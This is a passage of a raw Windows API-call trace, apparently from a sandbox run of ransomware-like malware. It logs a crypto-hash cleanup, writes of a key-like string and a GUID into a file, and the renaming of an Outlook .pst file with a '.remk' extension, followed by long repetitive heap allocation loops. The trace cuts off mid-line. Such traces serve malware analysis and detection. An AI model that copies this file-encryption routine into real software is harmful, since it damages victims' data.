[0233.297] GetLastError () returned 0x0 [0233.297] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.297] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.297] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.298] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.298] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.299] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.300] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.300] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.463] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.512] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.512] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.513] CloseHandle (hObject=0x640) returned 1 [0233.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b8 [0233.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0233.519] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.remk")) returned 1 [0233.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.520] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.520] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a46c0 | out: hHeap=0x630000) returned 1 [0233.530] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0233.530] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.530] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.530] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0233.537] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 